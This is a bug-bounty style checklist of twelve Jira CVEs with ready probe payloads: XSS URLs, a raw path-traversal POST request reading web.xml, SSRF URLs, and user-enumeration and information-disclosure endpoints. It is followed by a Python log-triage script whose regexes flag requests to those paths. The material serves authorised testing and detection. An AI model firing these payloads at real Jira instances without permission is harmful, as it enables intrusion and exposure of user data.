1. CVE-2019-3402 (XSS)
    1. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
    2. Observe that the payload is executed.
  2. CVE-2019-3396 (Path Traversal)
    1. Send the POST request below to the JIRA target (a blank line must separate the headers from the JSON body):

       ```
       POST /rest/tinymce/1/macro/preview HTTP/1.1
       Host: {{Hostname}}
       Accept: */*
       Accept-Language: en-US,en;q=0.5
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
       Referer: {{Hostname}}
       Content-Length: 168
       Connection: close

       {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
       ```
  3. CVE-2019-11581 (Template Injection)
    1. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
    2. Try the SSTI payloads.
  4. CVE-2020-14179 (Information Disclosure)
    1. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
    2. It leaks information about custom fields, custom SLA, etc.
  5. CVE-2020-14178 (Project Key Enumeration)
    1. Navigate to <JIRA_URL>/browse.<project_key>
    2. Observe how the error message differs for a valid vs. an invalid project key. Apart from the enumeration, you can often get unauthenticated access to the project if protections are not in place.
  6. CVE-2020-14181 (User Enumeration)
    1. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<username>
    2. Observe how the response differs when a valid vs. an invalid username is provided.
  7. CVE-2019-3403 (User Enumeration)
    1. Navigate to <JIRA_URL>/rest/api/2/user/picker?query=<user_name_here>
    2. Observe the difference in response when a valid vs. an invalid user is queried.
  8. CVE-2019-8442 (Sensitive Information Disclosure)
    1. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
    2. Observe that the pom.xml file is accessible.
  9. CVE-2019-8449 (User Information Disclosure)
    1. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
    2. Observe that user-related information is returned.
  10. CVE-2019-8451 (SSRF)
    1. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
  11. CVE-2018-20824 (XSS)
    1. Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
    2. Observe that the payload is executed.
  12. CVE-2017-9506 (SSRF)
    1. Navigate to <JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_payload_here>
  13. Use the Nuclei scanner by ProjectDiscovery to automate detection of most of these CVEs
    1. MindMap Created By: @harshbothra_
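
The same endpoint list seen from the detection side, as an added example that is not part of the original mind map: a small access-log triage script that tags requests to the paths listed above with the matching CVE. The combined-style log layout, the sample lines, the IP addresses and the host name `jira.example.test` are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# (CVE from the list above, regex on decoded path, regex on decoded query or None).
# A hit is a triage lead only: several of these endpoints also serve normal traffic.
SIGNATURES = [
    ("CVE-2019-3402", r"^/secure/ConfigurePortalPages!default\.jspa$", r"searchOwnerUserName=[^&]*[<>]"),
    ("CVE-2019-3396", r"^/rest/tinymce/1/macro/preview$", None),
    ("CVE-2019-11581", r"^/secure/ContactAdministrators!default\.jspa$", None),
    ("CVE-2020-14179", r"^/secure/QueryComponent!Default\.jspa$", None),
    ("CVE-2020-14178", r"^/browse\.[^/]+$", None),
    ("CVE-2020-14181", r"^/secure/ViewUserHover\.jspa$", r"username="),
    ("CVE-2019-3403", r"^/rest/api/2/user/picker$", r"query="),
    ("CVE-2019-8442", r"^/s/[^/]+/_/META-INF/", None),
    ("CVE-2019-8449", r"^/rest/api/[^/]+/groupuserpicker$", None),
    ("CVE-2019-8451", r"^/plugins/servlet/gadgets/makeRequest$", r"url=[^&]*@"),
    ("CVE-2018-20824", r"^/plugins/servlet/Wallboard/?$", r"cyclePeriod=[^&]*[^\d&]"),
    ("CVE-2017-9506", r"^/plugins/servlet/oauth/users/icon-uri$", r"consumerUri="),
]

# Assumed log layout: combined-style access log (an assumption, not from the page).
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(target):
    """Return the CVE ids whose endpoint pattern matches a request target."""
    parts = urlsplit(target)
    path, query = unquote(parts.path), unquote(parts.query)  # decode %3C etc. first
    return [cve for cve, p, q in SIGNATURES
            if re.search(p, path, re.I) and (q is None or re.search(q, query, re.I))]

def scan(lines):
    """Return (client ip, HTTP status, CVE id) for every matching log line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            hits += [(m["ip"], int(m["status"]), cve) for cve in classify(m["target"])]
    return hits

# Constructed sample log lines (documentation IP ranges, invented host name).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1" 200 9001',
    '198.51.100.23 - - [01/Jan/2024:10:00:06 +0000] "GET /s/x/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 3100',
    '198.51.100.23 - - [01/Jan/2024:10:00:07 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https://jira.example.test:1337@example.com HTTP/1.1" 200 410',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /plugins/servlet/Wallboard/?dashboardId=10000&cyclePeriod=30 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Several distinct CVE tags from one client in a short window, as in the sample, usually indicate a scanner run; the logged status code shows whether the endpoint answered.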